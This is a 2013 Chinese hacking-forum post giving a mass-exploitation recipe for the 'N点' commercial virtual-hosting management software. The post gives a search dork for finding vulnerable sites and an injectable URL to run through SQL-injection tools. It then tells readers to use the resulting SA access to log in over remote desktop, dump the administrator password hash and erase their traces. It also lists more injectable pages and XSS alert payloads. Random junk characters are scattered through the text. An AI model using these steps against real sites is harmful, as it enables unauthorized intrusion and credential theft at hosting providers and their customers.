中国网络渗透测试联盟

标题: N点商业版漏洞通杀0day以及利用方法 [打印本页]

作者: admin    时间: 2013-3-3 08:06
标题: N点商业版漏洞通杀0day以及利用方法
不得不说N点实在是一个破东西
* E" {( X9 ^# c) @就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂# m" c' M, Y) y/ u8 ?' P
好吧 抱怨一下就行了  接下来关键的时候到了/ t$ q5 m6 T& l2 H! D
首先百度搜索关键字:inurl: (mmdatabase.asp); A2 H! t- ]6 w  s
我随便列举一个:   www.xxxx.com( u1 g4 e7 j: p2 }1 @% B
修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1) W6 p. `. A: s6 ]7 p
扔入NBSI 或者啊D等各种傻逼工具后
. f  g: G) ^$ p- d( ~2 G9 w7 H你们会看到是SA权限5 P6 E' @! e/ O  U9 z
果断3389 上去  hash得到administrator密码& g& {0 I; r- i8 G
擦屁股走人~( l, G. l' l; b/ s) ?* ^0 J6 g" P
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的) J7 v* O: d0 j- Q* ^; h! ?

% {! k) S! P. U3 x/ r再附上其他几个漏洞页面
7 z+ y+ {: n4 q+ i6 k, O/ v2 S; B( ]0 {* [' cSQL:
1 R) Z5 L% {1 H1 z* Ehttp://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=11 v0 E# t% \2 T7 I" R. Q
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
4 k: L' m" v  h5 q) Bhttp://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
. r5 L8 b, h7 Rhttp://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
- h) |% y! @9 q  gXSS证明:" ^! I# A4 a& Z8 d$ B# Q6 R
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”! ^* K0 T1 Q; P* ?( |0 `/ ?
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
8 A1 h; O$ L8 K6 Yhttp://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>! o* C8 G: W2 f" F$ G
由此可见点就是坑逼中的战斗机   自从用了他我的眼泪都流干了  有做IDC的朋友千万别步我后尘啊   便宜没好货好货不便宜1 Y5 L8 o8 V) W
还是星外吧  你们懂的) F5 V9 P- q2 W; L  F6 _
作为一个商用程序   安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
. C3 r1 z6 d& g! u3 }" u" EPS:其实我真的很想知道你说N点这SB asp就asp吧  为什么asp还非要MSSQL  这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。   o(︶︿︶)o 唉
3 U0 ~4 Y9 O3 u——-




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2